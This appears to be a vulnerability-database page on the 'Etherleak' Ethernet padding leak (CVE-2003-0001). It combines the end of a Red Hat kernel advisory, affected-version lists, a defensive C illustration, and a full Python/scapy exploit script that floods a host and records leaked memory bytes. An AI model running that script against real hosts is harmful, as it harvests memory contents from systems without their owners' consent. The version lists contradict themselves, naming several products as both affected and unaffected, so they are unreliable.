/>ftp://updates.redhat.com/8.0/en/os/i386/kernel-doc-2.4.18-24.8.0.i386.rpm<br />ftp://updates.redhat.com/8.0/en/os/i386/kernel-BOOT-2.4.18-24.8.0.i386.rpm<br /><br />i586:<br />ftp://updates.redhat.com/8.0/en/os/i586/kernel-2.4.18-24.8.0.i586.rpm<br />ftp://updates.redhat.com/8.0/en/os/i586/kernel-smp-2.4.18-24.8.0.i586.rpm<br /><br />i686:<br />ftp://updates.redhat.com/8.0/en/os/i686/kernel-2.4.18-24.8.0.i686.rpm<br />ftp://updates.redhat.com/8.0/en/os/i686/kernel-smp-2.4.18-24.8.0.i686.rpm<br />ftp://updates.redhat.com/8.0/en/os/i686/kernel-bigmem-2.4.18-24.8.0.i686.rpm<br />ftp://updates.redhat.com/8.0/en/os/i686/kernel-debug-2.4.18-24.8.0.i686.rpm<br /><br /><br /><br />7. Verification:<br /><br />MD5 sum                          Package Name<br />--------------------------------------------------------------------------<br />4d0a3a9f1bcdfec8a014c5666a4c4501 7.1/en/os/SRPMS/kernel-2.4.18-24.7.x.src.rpm<br />7179efeb266bba7aa633a01267e24e74 7.1/en/os/athlon/kernel-2.4.18-24.7.x.athlon.rpm<br />fcd9c11db5c7c02bd8ac16c12260c0e6 7.1/en/os/athlon/kernel-smp-2.4.18-24.7.x.athlon.rpm<br />63f1217de153ff63217515e1b016da33 7.1/en/os/i386/kernel-2.4.18-24.7.x.i386.rpm<br />03a071c1c7252869382d683b1ceefa9f 7.1/en/os/i386/kernel-BOOT-2.4.18-24.7.x.i386.rpm<br />18dd6648f9d77d3d266e584c7c2feca4 7.1/en/os/i386/kernel-doc-2.4.18-24.7.x.i386.rpm<br />040aafbd075ad5f4041fa086a8179c80 7.1/en/os/i386/kernel-source-2.4.18-24.7.x.i386.rpm<br />0a6684bc40e9f9f06d934dd806e182b3 7.1/en/os/i586/kernel-2.4.18-24.7.x.i586.rpm<br />35e33d5b3746db33bdf747bf4a866e00 7.1/en/os/i586/kernel-smp-2.4.18-24.7.x.i586.rpm<br />e0f9b4ae807dd4ee026a026f8233e977 7.1/en/os/i686/kernel-2.4.18-24.7.x.i686.rpm<br />ef2c961e676946329d5221fda16e2846 7.1/en/os/i686/kernel-bigmem-2.4.18-24.7.x.i686.rpm<br />13e60edc74a4e9ae6efe396acab4eb70 7.1/en/os/i686/kernel-debug-2.4.18-24.7.x.i686.rpm<br />c7b78cdeb9e72d94cfa80bbe49303241 7.1/en/os/i686/kernel-smp-2.4.18-24.7.x.i686.rpm<br 
/>4d0a3a9f1bcdfec8a014c5666a4c4501 7.2/en/os/SRPMS/kernel-2.4.18-24.7.x.src.rpm<br />7179efeb266bba7aa633a01267e24e74 7.2/en/os/athlon/kernel-2.4.18-24.7.x.athlon.rpm<br />fcd9c11db5c7c02bd8ac16c12260c0e6 7.2/en/os/athlon/kernel-smp-2.4.18-24.7.x.athlon.rpm<br />63f1217de153ff63217515e1b016da33 7.2/en/os/i386/kernel-2.4.18-24.7.x.i386.rpm<br />03a071c1c7252869382d683b1ceefa9f 7.2/en/os/i386/kernel-BOOT-2.4.18-24.7.x.i386.rpm<br />18dd6648f9d77d3d266e584c7c2feca4 7.2/en/os/i386/kernel-doc-2.4.18-24.7.x.i386.rpm<br />040aafbd075ad5f4041fa086a8179c80 7.2/en/os/i386/kernel-source-2.4.18-24.7.x.i386.rpm<br />0a6684bc40e9f9f06d934dd806e182b3 7.2/en/os/i586/kernel-2.4.18-24.7.x.i586.rpm<br />35e33d5b3746db33bdf747bf4a866e00 7.2/en/os/i586/kernel-smp-2.4.18-24.7.x.i586.rpm<br />e0f9b4ae807dd4ee026a026f8233e977 7.2/en/os/i686/kernel-2.4.18-24.7.x.i686.rpm<br />ef2c961e676946329d5221fda16e2846 7.2/en/os/i686/kernel-bigmem-2.4.18-24.7.x.i686.rpm<br />13e60edc74a4e9ae6efe396acab4eb70 7.2/en/os/i686/kernel-debug-2.4.18-24.7.x.i686.rpm<br />c7b78cdeb9e72d94cfa80bbe49303241 7.2/en/os/i686/kernel-smp-2.4.18-24.7.x.i686.rpm<br />4d0a3a9f1bcdfec8a014c5666a4c4501 7.3/en/os/SRPMS/kernel-2.4.18-24.7.x.src.rpm<br />7179efeb266bba7aa633a01267e24e74 7.3/en/os/athlon/kernel-2.4.18-24.7.x.athlon.rpm<br />fcd9c11db5c7c02bd8ac16c12260c0e6 7.3/en/os/athlon/kernel-smp-2.4.18-24.7.x.athlon.rpm<br />63f1217de153ff63217515e1b016da33 7.3/en/os/i386/kernel-2.4.18-24.7.x.i386.rpm<br />03a071c1c7252869382d683b1ceefa9f 7.3/en/os/i386/kernel-BOOT-2.4.18-24.7.x.i386.rpm<br />18dd6648f9d77d3d266e584c7c2feca4 7.3/en/os/i386/kernel-doc-2.4.18-24.7.x.i386.rpm<br />040aafbd075ad5f4041fa086a8179c80 7.3/en/os/i386/kernel-source-2.4.18-24.7.x.i386.rpm<br />0a6684bc40e9f9f06d934dd806e182b3 7.3/en/os/i586/kernel-2.4.18-24.7.x.i586.rpm<br />35e33d5b3746db33bdf747bf4a866e00 7.3/en/os/i586/kernel-smp-2.4.18-24.7.x.i586.rpm<br />e0f9b4ae807dd4ee026a026f8233e977 7.3/en/os/i686/kernel-2.4.18-24.7.x.i686.rpm<br 
/>ef2c961e676946329d5221fda16e2846 7.3/en/os/i686/kernel-bigmem-2.4.18-24.7.x.i686.rpm<br />13e60edc74a4e9ae6efe396acab4eb70 7.3/en/os/i686/kernel-debug-2.4.18-24.7.x.i686.rpm<br />c7b78cdeb9e72d94cfa80bbe49303241 7.3/en/os/i686/kernel-smp-2.4.18-24.7.x.i686.rpm<br />3ab26ebfd1c80ba101b5b86bf5cd6421 8.0/en/os/SRPMS/kernel-2.4.18-24.8.0.src.rpm<br />6e12213933aac18036ecbec4e9d0b0ac 8.0/en/os/athlon/kernel-2.4.18-24.8.0.athlon.rpm<br />619979740d16881959d5f888aefaf195 8.0/en/os/athlon/kernel-smp-2.4.18-24.8.0.athlon.rpm<br />2be552e4025aba02877ca21a0bd64007 8.0/en/os/i386/kernel-2.4.18-24.8.0.i386.rpm<br />232613b661b5dc806647935bbab16cb0 8.0/en/os/i386/kernel-BOOT-2.4.18-24.8.0.i386.rpm<br />b0dddbebe98c52bdeb737473319008a0 8.0/en/os/i386/kernel-doc-2.4.18-24.8.0.i386.rpm<br />43ffe5e9be347b2da60d83cc03d64923 8.0/en/os/i386/kernel-source-2.4.18-24.8.0.i386.rpm<br />d69f50521cb66ce09a9cefde417e8107 8.0/en/os/i586/kernel-2.4.18-24.8.0.i586.rpm<br />91e3b03e57e7df41d1472b45ad151719 8.0/en/os/i586/kernel-smp-2.4.18-24.8.0.i586.rpm<br />5ccc7bd0668a144b91580490ae487744 8.0/en/os/i686/kernel-2.4.18-24.8.0.i686.rpm<br />551569c64e64b83c145dc17b08dd505b 8.0/en/os/i686/kernel-bigmem-2.4.18-24.8.0.i686.rpm<br />56fafedd2ee58f288327fb56eaafd884 8.0/en/os/i686/kernel-debug-2.4.18-24.8.0.i686.rpm<br />b125aab060782242428bdafb05edab93 8.0/en/os/i686/kernel-smp-2.4.18-24.8.0.i686.rpm<br /><br /><br />These packages are GPG signed by Red Hat, Inc. for security.  Our key<br />is available at http://www.redhat.com/about/contact/pgpkey.html<br /><br />You can verify each package with the following command:<br />    <br />    rpm --checksig -v <filename><br /><br />If you only wish to verify that each package has not been corrupted or<br />tampered with, examine only the md5sum with the following command:<br />    <br />    md5sum <filename><br /><br /><br />8. 
References:<br /><br />http://www.atstake.com/research/advisories/2003/a010603-1.txt<br />http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0001<br />http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0018<br /><br />9. Contact:<br /><br />The Red Hat security contact is <security@redhat.com>.  More contact<br />details at http://www.redhat.com/solutions/security/news/contact.html<br /><br />Copyright 2003 Red Hat, Inc.<br /><br /><br /><br /></code></pre>
</div>
    
    
     </div>
    

  </div>

</div>

</body>
</html>
    

- Vulnerability Information (F121969)

Cisco ASA Ethernet Information Leak (PacketStormID:F121969)
2013-06-10 00:00:00
prdelka  
exploit
cisco
CVE-2003-0001

This is the Cisco ASA ethernet information leak exploit that leverages the vulnerability noted in CVE-2003-0001. Versions prior to 8.4.4.6 and 8.2.5.32 are affected.

#!/usr/bin/env python
# CVE-2003-0001 'Etherleak' exploit
# =================================
# Exploit for hosts which use a network device driver that pads
# ethernet frames with data which vary from one packet to another,
# likely taken from kernel memory, system memory allocated to
# the device driver, or a hardware buffer on its network interface
# card. Exploit uses scapy with either ICMP or ARP requests as
# this can trigger with either but ICMP can hit layer3 filtering
# rules. Using ARP the padding appears to leak only fixed constant
# values when exploited, ICMP leaks random bytes.
#
# root@bt:~/0d# python cve-2003-0001.py x.x.x.254 icmp leaky
# WARNING: No route found for IPv6 destination :: (no default route?)
# [ CVE-2003-0001 'Etherleak' exploit
# [ Attacking x.x.x.254 for icmp padding saved to leaky.hex
# ............................................................^C!Killing
# !Killing
# root@bt:~/0d# hexdump -C leaky | head
# 00000000  e6 bd a6 9b 90 eb 44 f5  18 a5 29 2a 16 5a 08 ff  |......D...)*.Z..|
# 00000010  43 e1 23 07 8f 96 5a 24  3f 3d 33 7d b4 97 7e 18  |C.#...Z$?=3}..~.|
# 00000020  05 c9 7c 2c a5 c0 fa 7a  76 f3 51 c0 fe 07 72 32  |..|,...zv.Q...r2|
# 00000030  9e ad 6a 67 ad 43 58 17  60 43 bc 2b b8 fb cc 70  |..jg.CX.`C.+...p|
# 00000040  99 92 80 84 03 03 6f 8f  18 d3 5b 5e f0 1e 3a 83  |......o...[^..:.|
# 00000050  3d 82 e7 cd 3e 1f 31 74  b0 06 8c a2 7e 14 6b fb  |=...>.1t....~.k.|
# 00000060  72 9b ac 64 74 9b a4 d9  23 5b 92 82 0d 0b 31 f0  |r..dt...#[....1.|
# 00000070  a9 4f dd 3f bf 2b 5c 67  6c 22 fa da d0 2b d6 39  |.O.?.+\gl"...+.9|
# 00000080  40 58 13 4f 3d bb 48 03  d3 53 3c 5c 44 d2 3d b2  |@X.O=.H..S<\D.=.|
# 00000090  4f f2 a9 4a 02 80 4e 1b  6c bd 69 89 bd 76 1b 0a  |O..J..N.l.i..v..|
#
# This issue has been resolved in ASA 8.4.4.6/8.2.5.32. Cisco Bug reference
# is CSCua88376 and PSIRT-0669464365.
#
#  -- prdelka
#
import os
import sys
import signal
import binascii
from scapy.all import *
 
def signalhandler(signal,id):
    print "!Killing"
    sys.exit(0)
 
def spawn(host,type):
    if type == 'arp':
        send(ARP(pdst=host),loop=1,nofilter=1)
    elif type == 'icmp':
        send(IP(dst=host)/ICMP(type=8)/'x',loop=1,nofilter=1)      
 
if __name__ == "__main__":
    print "[ CVE-2003-0001 'Etherleak' exploit"
    signal.signal(signal.SIGINT,signalhandler)
    if len(sys.argv) < 4:
        print "[ No! Use with <host> <arp|icmp> <file>"
        sys.exit(1)
    type = sys.argv[2]
    if type == 'arp':
        pass
    elif type == 'icmp':
        pass
    else:
        print "Bad type!"
        sys.exit(0)
    pid = os.fork()
    if(pid):
        print "[ Attacking %s for %s padding saved to %s.hex" % (sys.argv[1],sys.argv[2],sys.argv[3])
        spawn(sys.argv[1],sys.argv[2])
    while True:
        if type == 'arp':
            myfilter = "host %s and arp" % sys.argv[1]
        elif type == 'icmp':
            myfilter = "host %s and icmp" % sys.argv[1]
        x = sniff(count=1,filter=myfilter,lfilter=lambda x: x.haslayer(Padding))
        p = x[0]
        if type == 'arp':
            pad = p.getlayer(2)
        if type == 'icmp':
            pad = p.getlayer(4)
        leak =  str(pad)
        hexfull = binascii.b2a_hex(leak)
        file = "%s.hex"%sys.argv[3]
        fdesc = open(file,"a")
        fdesc.write(hexfull + "\n")
        fdesc.close()
        # 32 bits leaked here for me.
        if type == 'icmp':
            bytes = leak[9:13]
        elif type == 'arp':
            bytes = leak[10:14]
        fdesc = open(sys.argv[3],"ab")
        fdesc.write(bytes)
        fdesc.close()


    

- Vulnerability Information

3873
Multiple Ethernet Driver Frame Padding Information Disclosure
Authentication Management, Information Disclosure
Loss of Confidentiality, Loss of Integrity

- Vulnerability Description

Multiple Ethernet Network Interface Card (NIC) device drivers contain a flaw that may result in information leakage. The issue is triggered when Ethernet device drivers reuse old frame buffer data to pad packets. The flaw may allow remote attackers to harvest sensitive information from affected devices, resulting in a loss of confidentiality.

- Timeline

2004-02-09 Unknown
Unknown Unknown

- Solution

Contact vendor for upgrade to fix this vulnerability. An upgrade is required as there are no known workarounds.

- References

- Vulnerability Author

Unknown or Incomplete

- Vulnerability Information

Multiple Vendor Network Device Driver Frame Padding Information Disclosure Vulnerability
Design Error 6535
Yes No
2003-01-06 12:00:00 2007-03-23 07:33:00
Discovery of this vulnerability credited to Ofir Arkin <ofir@sys-security.com> and Josh Anderson <josh@sys-security.com>.

- Affected Versions

ZyXEL ZyNOS V3.40(ES.5)
+ ZyXEL Prestige 650R-11
Sun Solaris 9
Sun Solaris 8_sparc
Sun Solaris 7.0
Sun Solaris 2.6
NetBSD NetBSD 1.6
NetBSD NetBSD 1.5.3
NetBSD NetBSD 1.5.2
NetBSD NetBSD 1.5.1
NetBSD NetBSD 1.5
Microsoft Windows 2000 Terminal Services SP2
+ Microsoft Windows 2000 Advanced Server SP2
+ Microsoft Windows 2000 Datacenter Server SP2
+ Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Terminal Services SP1
+ Microsoft Windows 2000 Advanced Server SP1
+ Microsoft Windows 2000 Datacenter Server SP1
+ Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Terminal Services
+ Microsoft Windows 2000 Advanced Server
+ Microsoft Windows 2000 Datacenter Server
+ Microsoft Windows 2000 Server
Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server 0
+ Avaya S8100 Media Servers 0
Microsoft Windows 2000 Professional SP2
Microsoft Windows 2000 Professional SP1
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Datacenter Server SP2
Microsoft Windows 2000 Datacenter Server SP1
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server
Mandriva Linux Mandrake 9.1 ppc
Mandriva Linux Mandrake 9.1
Mandriva Linux Mandrake 9.0
Mandriva Linux Mandrake 8.2 ppc
Mandriva Linux Mandrake 8.2
MandrakeSoft Multi Network Firewall 2.0
MandrakeSoft Corporate Server 2.1
Linux kernel 2.4.21 pre4
+ Mandriva Linux Mandrake 9.1 ppc
+ Mandriva Linux Mandrake 9.1
Linux kernel 2.4.20
Linux kernel 2.4.19
+ Conectiva Linux 8.0
+ Conectiva Linux Enterprise Edition 1.0
+ MandrakeSoft Corporate Server 2.1 x86_64
+ MandrakeSoft Corporate Server 2.1
+ MandrakeSoft Multi Network Firewall 2.0
+ Mandriva Linux Mandrake 9.0
+ S.u.S.E. Linux 8.1
+ Slackware Linux -current
+ SuSE SUSE Linux Enterprise Server 8
+ SuSE SUSE Linux Enterprise Server 7
Linux kernel 2.4.18 x86
Linux kernel 2.4.18
+ Astaro Security Linux 2.0 23
+ Astaro Security Linux 2.0 16
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Mandriva Linux Mandrake 8.2
+ Mandriva Linux Mandrake 8.1
+ Mandriva Linux Mandrake 8.0
+ Red Hat Enterprise Linux AS 2.1 IA64
+ RedHat Advanced Workstation for the Itanium Processor 2.1 IA64
+ RedHat Advanced Workstation for the Itanium Processor 2.1
+ RedHat Linux 8.0
+ RedHat Linux 7.3
+ S.u.S.E. Linux 8.1
+ S.u.S.E. Linux 8.0
+ S.u.S.E. Linux 7.3
+ S.u.S.E. Linux 7.2
+ S.u.S.E. Linux 7.1
+ S.u.S.E. Linux Connectivity Server
+ S.u.S.E. Linux Database Server 0
+ S.u.S.E. Linux Firewall on CD
+ S.u.S.E. Linux Office Server
+ S.u.S.E. Linux Openexchange Server
+ S.u.S.E. Linux Personal 8.2
+ S.u.S.E. SuSE eMail Server 3.1
+ S.u.S.E. SuSE eMail Server III
+ SuSE SUSE Linux Enterprise Server 8
+ SuSE SUSE Linux Enterprise Server 7
+ Turbolinux Turbolinux Server 8.0
+ Turbolinux Turbolinux Server 7.0
+ Turbolinux Turbolinux Workstation 8.0
+ Turbolinux Turbolinux Workstation 7.0
Linux kernel 2.4.17
Linux kernel 2.4.16
+ Sun Cobalt RaQ 550
Linux kernel 2.4.15
Linux kernel 2.4.14
Linux kernel 2.4.13
+ Caldera OpenLinux Server 3.1.1
+ Caldera OpenLinux Workstation 3.1.1
Linux kernel 2.4.12
+ Conectiva Linux 7.0
Linux kernel 2.4.11
Linux kernel 2.4.10
Linux kernel 2.4.9
+ Red Hat Enterprise Linux AS 2.1 IA64
+ Red Hat Enterprise Linux AS 2.1
+ RedHat Enterprise Linux ES 2.1 IA64
+ RedHat Enterprise Linux ES 2.1
+ RedHat Enterprise Linux WS 2.1 IA64
+ RedHat Enterprise Linux WS 2.1
+ RedHat Linux 7.2 ia64
+ RedHat Linux 7.2 i386
+ RedHat Linux 7.2 alpha
+ RedHat Linux 7.1 ia64
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1 alpha
+ Sun Linux 5.0.5
+ Sun Linux 5.0.3
+ Sun Linux 5.0
Linux kernel 2.4.8
+ Mandriva Linux Mandrake 8.2
+ Mandriva Linux Mandrake 8.1
+ Mandriva Linux Mandrake 8.0
Linux kernel 2.4.7
+ RedHat Linux 7.2
+ S.u.S.E. Linux 7.2
+ S.u.S.E. Linux 7.1
Linux kernel 2.4.6
Linux kernel 2.4.5
+ Slackware Linux 8.0
Linux kernel 2.4.4
+ S.u.S.E. Linux 7.2
Linux kernel 2.4.3
+ Mandriva Linux Mandrake 8.0 ppc
+ Mandriva Linux Mandrake 8.0
Linux kernel 2.4.2
Linux kernel 2.4.1
Linux kernel 2.2.19
+ EnGarde Secure Linux 1.0.1
+ Immunix Immunix OS 7+
+ MandrakeSoft Single Network Firewall 7.2
+ Mandriva Linux Mandrake 8.1
+ Mandriva Linux Mandrake 8.0 ppc
+ Mandriva Linux Mandrake 8.0
+ S.u.S.E. Linux 7.0
+ S.u.S.E. Linux 6.4
+ S.u.S.E. Linux 6.3
+ Trustix Secure Linux 1.5
Linux kernel 2.2.18
+ Caldera OpenLinux 2.4
+ Conectiva Linux 6.0
+ Conectiva Linux 5.1
+ Conectiva Linux 5.0
+ Conectiva Linux 4.2
+ Conectiva Linux 4.1
+ Conectiva Linux 4.0 es
+ Conectiva Linux 4.0
+ Conectiva Linux graficas
+ Conectiva Linux ecommerce
+ Debian Linux 2.2 sparc
+ Debian Linux 2.2 powerpc
+ Debian Linux 2.2 arm
+ Debian Linux 2.2 alpha
+ Debian Linux 2.2 68k
+ Debian Linux 2.2
+ Mandriva Linux Mandrake 7.2
+ Mandriva Linux Mandrake 7.1
+ Mandriva Linux Mandrake 7.0
+ Mandriva Linux Mandrake 6.1
+ Mandriva Linux Mandrake 6.0
+ RedHat Linux 7.0 sparc
+ RedHat Linux 7.0 i386
+ RedHat Linux 7.0 alpha
+ RedHat Linux 6.2 sparc
+ RedHat Linux 6.2 i386
+ RedHat Linux 6.2 alpha
+ RedHat Linux 6.1 sparc
+ RedHat Linux 6.1 i386
+ RedHat Linux 6.1 alpha
+ RedHat Linux 6.0 sparc
+ RedHat Linux 6.0 alpha
+ RedHat Linux 6.0
+ S.u.S.E. Linux 7.0
+ S.u.S.E. Linux 6.4 ppc
+ S.u.S.E. Linux 6.4 alpha
+ S.u.S.E. Linux 6.4
+ S.u.S.E. Linux 6.3 ppc
+ S.u.S.E. Linux 6.3 alpha
+ S.u.S.E. Linux 6.3
+ S.u.S.E. Linux 6.1 alpha
+ S.u.S.E. Linux 6.1
+ S.u.S.E. Linux 6.0
+ SCO eDesktop 2.4
+ SCO eServer 2.3.1
+ Slackware Linux 7.1
+ Slackware Linux 7.0
+ Slackware Linux 4.0
+ Wirex Immunix OS 7.0 -Beta
+ Wirex Immunix OS 7.0
+ Wirex Immunix OS 6.2
Linux kernel 2.2.17
+ Mandriva Linux Mandrake 7.2
+ S.u.S.E. Linux 7.0
+ Trustix Secure Linux 1.2
Linux kernel 2.2.16
Linux kernel 2.2.15
+ MandrakeSoft Corporate Server 1.0.1
+ Mandriva Linux Mandrake 7.1
Linux kernel 2.2.14
+ Red Hat Linux 6.2
+ SCO eDesktop 2.4
+ SCO eServer 2.3.1
+ Sun Cobalt RaQ 4
Linux kernel 2.0.39
Linux kernel 2.0.38
Linux kernel 2.0.37
Linux kernel 2.0.36
Linux kernel 2.0.35
Linux kernel 2.0.34
Linux kernel 2.0.33
Linux kernel 2.0.32
Linux kernel 2.0.31
Linux kernel 2.0.30
Linux kernel 2.0.29
Linux kernel 2.0.28
Linux kernel 2.0.27
Linux kernel 2.0.26
Linux kernel 2.0.25
Linux kernel 2.0.24
Linux kernel 2.0.23
Linux kernel 2.0.22
Linux kernel 2.0.21
Linux kernel 2.0.20
Linux kernel 2.0.19
Linux kernel 2.0.18
Linux kernel 2.0.17
Linux kernel 2.0.16
Linux kernel 2.0.15
Linux kernel 2.0.14
Linux kernel 2.0.13
Linux kernel 2.0.12
Linux kernel 2.0.11
Linux kernel 2.0.10
Linux kernel 2.0.9
Linux kernel 2.0.8
Linux kernel 2.0.7
Linux kernel 2.0.6
Linux kernel 2.0.5
Linux kernel 2.0.4
Linux kernel 2.0.3
Linux kernel 2.0.2
Linux kernel 2.0.1
Linux kernel 2.0
Leif M. Wright simplestmail.cgi 2.0.22
HP JetDirect J6035A
HP HP-UX (VVOS) 11.0 4
HP HP-UX 11.0
HP HP-UX 10.20 Series 800
HP HP-UX 10.20 Series 700
HP HP-UX 10.20
FreeBSD FreeBSD 4.7
FreeBSD FreeBSD 4.6
FreeBSD FreeBSD 4.5
FreeBSD FreeBSD 4.4
FreeBSD FreeBSD 4.3
FreeBSD FreeBSD 4.2
SGI IRIX 6.5.20
SGI IRIX 6.5.19 m
SGI IRIX 6.5.19 f
SGI IRIX 6.5.19
SGI IRIX 6.5.18 m
SGI IRIX 6.5.18 f
SGI IRIX 6.5.18
SGI IRIX 6.5.17 m
SGI IRIX 6.5.17 f
SGI IRIX 6.5.17
SGI IRIX 6.5.16 m
SGI IRIX 6.5.16 f
SGI IRIX 6.5.16
SGI IRIX 6.5.15 m
SGI IRIX 6.5.15 f
SGI IRIX 6.5.15
SGI IRIX 6.5.14 m
SGI IRIX 6.5.14 f
SGI IRIX 6.5.14
IBM AIX 4.3.3
IBM AIX 4.3.2
IBM AIX 4.3.1
IBM AIX 4.3
IBM AIX 4.2.1
IBM AIX 4.2
IBM AIX 4.1
IBM AIX 4.0
IBM AIX 5.1
Clavister Firewall 8.0
Cisco PIX Firewall 515

- Unaffected Versions

SGI IRIX 6.5.20
SGI IRIX 6.5.19 m
SGI IRIX 6.5.19 f
SGI IRIX 6.5.19
SGI IRIX 6.5.18 m
SGI IRIX 6.5.18 f
SGI IRIX 6.5.18
SGI IRIX 6.5.17 m
SGI IRIX 6.5.17 f
SGI IRIX 6.5.17
SGI IRIX 6.5.16 m
SGI IRIX 6.5.16 f
SGI IRIX 6.5.16
SGI IRIX 6.5.15 m
SGI IRIX 6.5.15 f
SGI IRIX 6.5.15
SGI IRIX 6.5.14 m
SGI IRIX 6.5.14 f
SGI IRIX 6.5.14
IBM AIX 4.3.3
IBM AIX 4.3.2
IBM AIX 4.3.1
IBM AIX 4.3
IBM AIX 4.2.1
IBM AIX 4.2
IBM AIX 4.1
IBM AIX 4.0
IBM AIX 5.1
Clavister Firewall 8.0
Cisco PIX Firewall 515

- Discussion

Network device drivers for several vendors have been reported to disclose potentially sensitive information to attackers.

Frames that are smaller than the minimum frame size should have the unused portion of the frame buffer padded with null (or other) bytes. Some device drivers fail to do this adequately, leaving the data that was stored in the memory comprising the buffer prior to its use intact. Consequently, this data may be transmitted within frames across Ethernet segments. Since the Ethernet frame buffer is allocated in kernel memory space, sensitive data may be leaked.

Cisco has stated that the IOS 12.1 and 12.2 trains are not affected.

National Semiconductor Ethernet controller chips are not vulnerable to this issue.
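
An added illustration (not code from the advisory or from any vendor's driver): a user-space C model of the padding flaw described in the discussion above, with the flawed and the corrected transmit paths side by side and an audit check that counts non-null pad bytes. The function names, the simulated `tx_buf` and the sample frames are constructed for this example.

```c
#include <stdint.h>
#include <string.h>

#define ETH_HLEN 14              /* dst MAC + src MAC + EtherType */
#define ETH_ZLEN 60              /* minimum frame without FCS: 14 + 46 */

static uint8_t tx_buf[1514];     /* simulated transmit buffer, reused per frame */

/* Flawed: round the length up but keep whatever the last frame left behind. */
size_t tx_prepare_unpadded(const uint8_t *frame, size_t len)
{
    memcpy(tx_buf, frame, len);
    return len < ETH_ZLEN ? ETH_ZLEN : len;
}

/* Corrected: null the gap between the real data and the minimum length. */
size_t tx_prepare_zero_padded(const uint8_t *frame, size_t len)
{
    memcpy(tx_buf, frame, len);
    if (len < ETH_ZLEN) {
        memset(tx_buf + len, 0, ETH_ZLEN - len);
        len = ETH_ZLEN;
    }
    return len;
}

/* Audit check: non-null bytes between the real data and the end of the frame. */
size_t nonzero_pad_bytes(const uint8_t *wire, size_t wire_len, size_t data_len)
{
    size_t n = 0;
    for (size_t i = data_len; i < wire_len; i++)
        n += (wire[i] != 0);
    return n;
}

/* Constructed scenario: a 200-byte frame, then a 43-byte one in the same buffer. */
size_t stale_bytes_after_reuse(int zero_pad)
{
    uint8_t prev[200], small[ETH_HLEN + 29];   /* 29 = IP 20 + ICMP 8 + 1 data */
    memset(prev, 0x41, sizeof prev);           /* stands in for earlier traffic */
    memset(small, 0x11, sizeof small);
    tx_prepare_zero_padded(prev, sizeof prev);
    size_t n = zero_pad ? tx_prepare_zero_padded(small, sizeof small)
                        : tx_prepare_unpadded(small, sizeof small);
    return nonzero_pad_bytes(tx_buf, n, sizeof small);
}

/* Exit status 0 when the corrected path leaves no stale bytes in the padding. */
int main(void) { return stale_bytes_after_reuse(1) != 0; }
```

With the flawed path, all 17 pad bytes of the short frame carry data from the earlier frame; with the corrected path the count is zero, which is the property to check for in captures from patched devices.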

- Exploit

A sample exploit has been provided:

- Solution

Please see the referenced advisories for information on obtaining and applying fixes.


Sun Solaris 8_sparc

Sun Solaris 2.6

Sun Solaris 7.0

Sun Solaris 9

HP HP-UX 10.20

HP HP-UX 10.20 Series 800

HP HP-UX 10.20 Series 700

HP HP-UX 11.0

HP HP-UX (VVOS) 11.0 4

MandrakeSoft Multi Network Firewall 2.0

MandrakeSoft Corporate Server 2.1

Linux kernel 2.2.14

Linux kernel 2.2.17

Linux kernel 2.2.19

Linux kernel 2.4.17

Linux kernel 2.4.18

Linux kernel 2.4.21 pre4

Mandriva Linux Mandrake 8.2

Mandriva Linux Mandrake 8.2 ppc

Mandriva Linux Mandrake 9.1 ppc

Mandriva Linux Mandrake 9.1

- References

 

 
